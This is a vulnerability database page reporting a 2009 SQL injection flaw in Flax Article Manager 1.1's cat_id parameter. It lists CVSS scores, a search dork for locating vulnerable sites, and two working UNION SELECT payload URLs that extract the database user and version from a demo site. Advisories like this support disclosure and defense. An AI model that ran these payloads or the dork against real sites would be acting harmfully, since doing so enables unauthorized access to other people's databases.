Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability

2009.01.29
Credit: jiko
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------- -- JIKO FroM No-exploit.Com --- ------------------------------------------------------------------------- # Author : jiko # email : jalikom@hotmail.com # Home : www.no-exploit.Com # Script : http://www.clixint.com/products/articles -->Article Manager -->Price: $99 USD $99*10 Dh(maroc)=990Dh=19800 Real maghribi # Dork: Copyright 2006 © Flax Article Manager v1.1 =========================[JAWAD Cha7ta 4 ever]=================== # Exploit : http://no-exploit.com Demo: http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5-- http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) ) Top: ( R07 T9awwad ) To str0ke & Milw0rM Cyber-Zone CHof Lfo9 =========================[Thanks To Allah ]=================== Ma3aki ya GaZa greetz : all my friend and all No-exploit members and $ cyber-zone $ leopard $ Hassin X all muslims cyber-zone Wald Bladi B7al Khoya ------------------------------------------------------------------------- -- JIKO FroM No-exploit.Com --- ------------------------------------------------------------------------- ------== troops of Mohamed comming inchalah =----------------- Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

References:

http://www.securityfocus.com/bid/33422
http://www.milw0rm.com/exploits/7862
http://secunia.com/advisories/33625


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top